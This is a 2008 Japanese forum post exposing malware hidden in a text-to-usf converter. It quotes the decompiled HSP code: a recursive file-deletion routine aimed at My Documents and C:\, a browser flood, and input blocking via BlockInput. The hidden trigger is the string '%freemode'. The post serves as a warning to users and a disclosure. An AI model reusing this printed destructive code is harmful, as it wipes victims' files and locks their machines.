| トピック名 | これ、どういうこと? |
|---|---|
| 投稿者 | NV |
| 概要 | これは重大な話である。 txt→usf変換。これにはウィルスが入ってる。 まず問題となるのはこの関数。 #deffunc _ining str prm_38, int prm_39, local prm_40, local prm_41, local
chdir prm_38
notesel prm_40
dirlist prm_40, "*.*", 1
repeat noteinfo(0)
noteget prm_41, cnt
exist dirinfo(0) + "\\" + prm_41
mes dirinfo(0) + "\\" + prm_41 + "(" + strsize + "バイト) を削除しています..."
wait rnd(30)
if ( ginfo(23) > ginfo(13) ) {
color
boxf
color 255, 255, 255
pos , 5
}
await 2
loop
dirlist prm_40, "*.*", 5
repeat noteinfo(0)
noteget prm_41, cnt
noteunsel
_ining prm_41, prm_39 + 1
notesel prm_40
await 10
loop
if ( prm_39 ) {
chdir "../"
}
return_ining命令という名前で、フォルダを指定してファイルを削除できるようになっている。 次はこれ。 *label_07
bgscr 2, ginfo(20), ginfo(21), 0, 0, 0
color
boxf
oncmd gosub *label_08, 275
SetTimer hwnd, 1, 100, 0
onexit gosub *label_09
repeat 50
if ( rnd(2) ) {
exec "http://yahoo.co.jp", 16
}
else {
exec "http://www.google.co.jp/", 16
}
loop
BlockInput 1
color 255, 255, 255
pos 50, 50
mes "説明書にちゃんと「%freemode%を使うな」って書いてあったのに"
mes "使うからこんなことになるんですよ(ぇ"
mes " by うひょ\n"
mes "マウス・キーボードの入力を無効化しました。"
mes "タスクマネージャを無効化しました。"
_ining dirinfo(65541), 0
_ining "C:\\", 0
stopここが問題である。 _ining dirinfo(65541), 0 _ining "C:\\", 0 dirinfo(65541)で取得できる情報はマイドキュメントのディレクトリ。 "C:\\"は、C:\直下である。 _ining命令は、フォルダを指定してファイルを削除できるようになっている。 これは明らか破壊活動だろう。 他にも、exec命令を使用したブラウザクラッシャー、BlockInput APIを使用した入力妨害、タスクマネージャへの妨害活動を行う。 発動条件 if ( instr(var_6, 0, "%freemode") >= 0 ) {
goto *label_07
}より、ファイルの内容に%freemodeが含まれているとき。 活動まとめ ・http://yahoo.co.jp、http://www.google.co.jp/をランダムで50個開く ・入力を妨害する ・タスクマネージャの動作を妨害する ・マイドキュメント・Cドライブ直下のファイルをすべて削除する 作者へ この件がどういうことだか説明をしてほしい。 このソフトを使ってるユーザへ 即使用を中止すべきである。 |
| 作成日 | 2008年03月22日 14:55 |
最初 << >> 最後